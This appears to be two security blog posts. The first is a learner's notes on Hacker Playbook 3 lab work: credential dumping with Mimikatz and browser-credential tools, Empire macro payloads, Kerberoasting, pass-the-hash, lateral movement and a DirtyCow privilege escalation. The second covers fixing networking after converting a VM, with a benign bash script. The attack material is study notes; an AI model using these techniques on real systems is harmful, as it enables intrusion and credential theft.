Mimikatz has been an effective tool for getting passwords, but it doesn’t work with Windows 10. To get the passwords back in LSASS, you can adjust the registry key. It just requires the user to log in again. Locking the workstation is the easiest way to accomplish this, triggering a lock screen (rundll32.exe user32.dll,LockWorkStation). Then run Mimikatz again to get the passwords.

Mimikittenz is a tool to get passwords from target processes, like browsers. You can also write search expressions within Mimikittenz. And it doesn’t require local admin access. But you have to get the script onto the box.

I used the psexec module in Metasploit to get to where I could use Mimikatz. I did some work in both Win7 and Win10. I had to migrate meterpreter to a 64-bit process in Win10. I could load and run Mimikatz. It did warn me I was using Mimikatz on a newer OS and recommended Kiwi instead. Running Mimikatz didn’t get usable info (which was expected). I gave Kiwi a shot as recommended, and was able to get hashes.

I have been able to use Mimikatz in other labs, and it works well when the conditions are right. Kind of like most tools.

Getting Passwords from the Windows Credential Store and Browsers

The Windows Credential Store is where usernames, etc. are saved when MS IE or Edge save your info. Info is accessible by the user. There are scripts available to get the info – Get-WebCredentials and Gathering Windows Credentials. Empire also has an option to get creds from Chrome (payload powershell/collection/ChromeDump). There are also tools available to extract cookies and get info from file sharing utilities.

Getting Local Creds and Information from OSX

For understandable reasons, most resources, including THP3, focus on Windows. That’s what is found in most enterprise environments. But Macs exist and may be fairly prevalent depending on the environment. There are similar attacks to get info from Macs. Kim talks about using Empire to target Macs, specifically setting up an Office macro payload – launch Empire, get a listener going, then usestager osx/macro, set OutFile /tmp/, and generate the payload. It’s Base64 code executed by Python, which is installed by default on Macs. Pop open Excel, create a macro, and swap out your payload for the macro code. Then save as an xlsm. I don’t have a Mac to test on, so just an interesting read for now. I’ve not had luck finding options for testing on Mac OS unfortunately, so until I can find a way, at least I’ve got some ideas.

Living Off of the Land in a Windows Domain Environment

This section focuses on using PowerShell Empire, but the takeaway is that if you can upload PowerShell scripts, you can do a lot of damage.

General notes as I continue to play with things…

Service Principal Names

Service Principal Names can provide info on databases and web servers. The setspn.exe file can be used – it’s on Windows by default, so handy to avoid having to deliver payloads. Basic format is

 setspn -T <domain> -F -Q */*

-T specifies the domain, -F sets queries to be at the forest rather than domain level, -Q specifies each target domain or forest, and */* queries everything. There are a lot of other options, so it might be helpful to check out the Microsoft wiki on setspn.

Querying Active Directory

This section focused on Empire and using PowerView. Since Empire is still giving me fits (meaning getting Empire payloads to work and get active agents), in the interest of time, I decided to use some of the other tools to do similar work. Instead of using PowerView to get info about Active Directory users, I used an Impacket example. The GetADUsers example will get info about the AD users including password last set and last logon dates. PowerView has queries to get user, group member, and computer info. It is another one of those things I’ll keep working with as I’m troubleshooting Empire. There are also Metasploit modules available to do similar tasks (in the post/windows/gather group).

Bloodhound
This is a cool way of graphically looking at things. I used it for SANS 2018 Holiday Hack (KringleCon) – one of the exercises involved analyzing a Bloodhound file. It’s definitely handy. From a defense perspective, this would be very helpful to identify potential exploitation paths. It can be run through Empire and with a faster C# option (Sharphound). The ingestor has to be on the host system and multiple files are generated that then need to be pulled over for analysis. The wiki is a great resource and is what I used for KringleCon. Kim provided files to work with. Unfortunately they are in CSV format, and Bloodhound 2.0 only takes JSON. I may go back later and convert the CSV to JSON, but for now I’ll move on since I worked with Bloodhound for KringleCon. The built-in queries are useful, so the tool is easy to get functioning once you have the files.

Some additional Bloodhound resources from Kim:

Moving Laterally – Migrating Processes

When you have a box with multiple users, it’s common to make/migrate tokens of different users. Metasploit can do this with the incognito module. Empire uses steal_tokens. According to Kim, this can break shells, so it’s a good idea to inject a new agent into a process owned by a different user. Empire’s PSInject can be used for this.

Moving Laterally Off Your Initial Host

The simplest option to pivot is using the permissions of the current user to get another box. There are options for this in Empire (the find_localadmin_access module) and Metasploit (local_admin_search_enum). Empire also has a lot of other options, so it’s a matter of spending time with it. There is also an option using Windows Management Instrumentation (WMI) in Empire.

Lateral Movement with DCOM

Distributed Component Object Model (DCOM) is another option for moving laterally. DCOM applications can be checked in PowerShell using Get-CimInstance Win32_DCOMApplication.

Some resources for learning more…

Pass-the-Hash
Hashes are fairly easy to get – Mimikatz and Responder have both been used to grab hashes in this chapter. The hashes can be passed using either Empire (powershell/credentials/powerdump) or Metasploit (exploit/windows/smb/psexec). This is an older method, but may still be encountered.

Gaining Creds from Service Accounts

This section talks about Kerberoasting. PowerShell is used to pull ticket info into memory. PowerSploit could also be used. Then Mimikatz can be used to export the tickets. Then the tickets have to be downloaded for cracking. The hashes can be cracked with tgsrepcrack, John the Ripper, or Hashcat. There is also a module in Empire to do this.

Dumping the Domain Controller Hashes

Multiple options here. You can run commands on the domain controller and use Shadow Volume/Raw. NinjaCopy and DCSync can also be used.

Lateral Movement via RDP over the VPS

Back to that VPS setup earlier…basically infect host, SSH from attacker to the VPS, set up local port forward, set up port forward in Meterpreter, and open RDP on the attack box. It’s more involved than that, but that’s the basic approach.

Pivoting in Linux

dnscat2 and Meterpreter have their own forwarding. An SSH shell could be used with local file inclusion or remote code execution. There’s a mimipenguin tool similar to Mimikatz to pull creds.

Privilege Escalation in Linux

Same basic approach as Windows. LinEnum is a big help to look for possible routes of exploitation. It does return a lot of info in my experience, but I’ve found it helpful in CTFs I’ve done. Kim also mentions Linux Exploit Suggester, which I’ve come across before. Raj Chandel has a great blog post on Linux privilege escalation that provides some additional options. Kim talks about DirtyCOW, which involves a race condition. The only problem is it can cause kernel panics, so you need to match the version to the kernel.

Linux Lateral Movement Lab

I had to switch these VMs over to VirtualBox. That turned into a bit of an adventure, so it turned into a separate blog post on converting VMs and dealing with IPs in a virtual lab. Just another hurdle to getting through this chapter. Good practice, but not exactly on-task. You do need sudo access to edit the interfaces file, so luckily Kim provided login info. There are likely other ways of doing it, but I didn’t want to spend any more time digging than I already had.

Scan the network, see what’s open. Check out the box that has a webserver setup. Several services running. Kim says a web fuzzer showed openCMS running Struts2, which has been involved in breaches before. Check Metasploit for an associated module, and give it a shot (struts2_content_type_ognl). Just running it with the default options, I didn’t get anywhere. When I kept reading and followed Kim’s steps, I still didn’t get anywhere. Or so I thought – this exploit will not show in Metasploit. It reports that the exploit was completed, but no session was created. Reading on to get the tidbit about going back to dnscat, I got everything working. I should remember to skim over the sections before I start when it’s been awhile since I read it. The dnscat shell is a bit slow, so there’s some patience required. Everything worked as it should, so on to DirtyCow. Had to switch over to a NAT Network for this so I could fetch DirtyCow. I ran into issues with wget being unable to resolve the host address. It seems that sometimes Ubuntu 16.04 and up has issues with DNS in VirtualBox. I decided that rather than track down a fix, I would just use my VPS since I can use its IP easily. Using that, I was able to get the DirtyCow exploit to work and add the suggestions Kim has to make the exploit more stable.

Following Kim’s direction, I was able to get over to the Jenkins box without issue. Pulling up the Jenkins site using port forwarding was incredibly slow. Like so painfully slow you think it died slow. But I was able to see what I was supposed to see. I was able to get all the way through following Kim’s walkthrough. I followed his instructions the first time through to get through quickly since DirtyCow can be unstable. I’ll take more time to look around as I come back to the lab. The ending point from the book’s perspective was getting an .ibd file. I believe the database can be recovered from the .frm and .ibd files available as the db_backup user, but that will require some research.

Wrap Up

Completing this chapter was a marathon effort. I think I’ve been working on it off and on for a month. It was a combination of maddening and frustrating. It was great because I learned a lot. But it was frustrating trying to track down why things weren’t working. Working with Active Directory and setting up a network was good experience. Taking that over to a server where I can build out a more complete network will be great. I had one or two servers plus several workstations going at once, but running all that with Kali did kill all my RAM and result in paused VMs. Not surprising.

Next Steps

  • Dedicate some time to Empire

  • Build network on server

  • Keep working on everything

  • Rejoice that chapters 5 and 6 are relatively low-key
Posted in Blog, Resources

Lab Troubleshooting – Converting and IPs

Part of learning is labbing. There is a lot of practice that can be on online through a browser, but there’s often a need to use a virtual machine. There are a lot of write-ups on the basics of VM setup. I want to do a quick run down of 2 issues I’ve come across recently getting a VMWare machine converted to VirtualBox and adjusting the IP address of the VM.

Converting VMs

VirtualBox and VMWare Workstation Player are common hypervisors. Most of the practice VMs I’ve found are designed and tested on one or the other. I have and use both. For the most part, using the hypervisor that the VM came in isn’t a problem. Occasionally, like a Linux pivoting lab I’m working on for The Hacker Playbook 3, I need to switch from one to the other. This lab involves a Linux environment where Peter Kim has set up static IPs on the VMs. To use it, you need to get your attack machine in the same range. I’ve not found a way to do this in the free VMWare Workstation Player. I’ve found that changing the IPs used when the designer specifies them often results in broken labs (or more trouble than they’re worth to fix labs).

This How-To Geek tutorial has solid instructions for converting between the two hypervisors. The only issue I ran into was getting the OVFTool open in the Windows command line. The easiest way should be to right-click in the folder where it is and use “Open command window here”. I didn’t have that option – I have open in PowerShell instead. The easiest adjustment for me was to copy the file path, open a command prompt, and just use cd "<copied filepath>".

Converting the files was simple and straightforward. Then it’s a matter of importing them into the appropriate hypervisor. But I found when I opened up the VM, the only connection I had was the loopback interface. For some reason, converting from a VMWare VM to a VirtualBox machine broke the networking. It took some creative googling to figure out what happened. The VMs for the lab were running Ubuntu that was recent enough to use Predictable Network Interface Names. These were different in the VMs after converting them to VirtualBox. A StackOverflow question had a solution that worked since creds were provided for the VMs. You do need sudo access, but it got the job done.

Basic steps:

  1. See what interfaces are available.

  2. Update the /etc/network/interfaces to reflect the appropriate interface name.

  3. Restart networking services by restarting the VM or running /etc/init.d/networking restart

  ip a # or ifconfig -a to see what interfaces are available
  sudo vi /etc/network/interfaces # enter sudo password and update file as needed
  sudo /etc/init.d/networking restart # restarting networking also needs root

The file will look something like:

  # The primary network interface
  auto enp0s3
  iface enp0s3 inet dhcp

Just switch out whatever your interface is for whatever is in the same location as enp0s3. Not a big deal to fix, but would be problematic without creds. Little nuances like this are why I keep the lab VM in the original format whenever I can. Learning how to convert and fix what breaks is valuable, but I’d prefer to spend that time working on my intended goals.
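As an added example (not from the original post), here is a small bash script that does the three steps above in one pass: it reads the interface name configured in /etc/network/interfaces, checks whether the kernel still has a NIC by that name, and if not, rewrites the auto/iface lines to the first NIC that actually exists. The function names and the sample file contents are my own; it prints the corrected file to stdout so you can review it before copying it into place.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: after a VMware -> VirtualBox
# conversion, Ubuntu's predictable interface name changes (e.g. ens33 -> enp0s3)
# while /etc/network/interfaces still names the old one, leaving only lo up.
set -eu

# Interface name configured in the file (first non-lo "iface X inet" stanza).
configured_nic() {
  awk '$1 == "iface" && $3 == "inet" && $2 != "lo" { print $2; exit }' "$1"
}

# Non-loopback NIC names the kernel currently knows about, one per line.
available_nics() {
  for d in /sys/class/net/*; do
    n=${d##*/}
    [ "$n" = lo ] || echo "$n"
  done
}

# Usage: rewrite_interfaces FILE NEWNIC [OLDNIC]
# Replaces OLDNIC (default: the configured name) with NEWNIC on the
# auto, allow-hotplug and iface lines; the result goes to stdout.
rewrite_interfaces() {
  file=$1 new=$2 old=${3:-$(configured_nic "$1")}
  sed -E "s/^((auto|allow-hotplug)[[:space:]]+)${old}([[:space:]]|$)/\1${new}\3/; s/^(iface[[:space:]]+)${old}([[:space:]]+inet)/\1${new}\2/" "$file"
}

# Usage: fix_interfaces FILE [NIC...]
# NIC list defaults to the kernel's list (pass names explicitly to test).
# Prints the fixed file, or the original unchanged if the configured NIC exists.
fix_interfaces() {
  file=$1; shift
  old=$(configured_nic "$file")
  if [ $# -gt 0 ]; then nics=$(printf '%s\n' "$@"); else nics=$(available_nics); fi
  if printf '%s\n' "$nics" | grep -qx -- "$old"; then
    cat "$file"                      # configured NIC still present, nothing to do
  else
    new=$(printf '%s\n' "$nics" | head -n 1)
    [ -n "$new" ] || { echo "no usable interface found" >&2; return 1; }
    rewrite_interfaces "$file" "$new" "$old"
  fi
}

# Typical use on the converted VM (needs sudo to write the file):
#   fix_interfaces /etc/network/interfaces > /tmp/interfaces.new
#   sudo cp /etc/network/interfaces /etc/network/interfaces.bak
#   sudo cp /tmp/interfaces.new /etc/network/interfaces
#   sudo /etc/init.d/networking restart
```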

Specifying IP range in VirtualBox

Sometimes labs will specify the IP ranges to use. It’s not always necessary to change them, but if it’s a more complex lab where multiple VMs are setup as a network, I’ve found it works better to take the time to make the IPs match. You can configure the VM using command utilities or VirtualBox settings. This post from Debugging Code has walkthroughs for several options.

VirtualBox has a lot of options for connecting the VM to the Internet. I recommend reading through the documentation to get a better understanding of what you should use when. I keep my labs in host-only for the most part, using NAT for external labs, and occasionally the other settings. It’s a good idea to check the network settings on the VMs you import. Since most are vulnerable by design, you don’t want them exposed to the Internet.

The typical situation I’ve encountered is needing to get everything on the same range, so the static IPs set up in the downloaded VMs will function as expected. My preferred approach is to use the host-only adapter. Open up VirtualBox then use Global Tools > Host Network Manager. Then you can configure/create/remove adapters as needed. You can also use the NAT network option if you will need outbound connections. Open VirtualBox, then File > Preferences > Network. You can add and configure NAT Networks here. You add the network, and then configure it.

Both options are easy to do – you just need to decide which is the better option for your situation. If you aren’t sure what the settings mean or what you should do with things like DHCP, take some time to research the protocols and learn what you need to know to make your labs function.

Wrap Up

Working on labs is important, and labs are much more fun when they work properly. Since these are things I’ve run into, I wanted a quick write-up for my reference. Hopefully it might help others as well.

Happy labbing!

Disclaimer – don’t do illegal stuff, etc.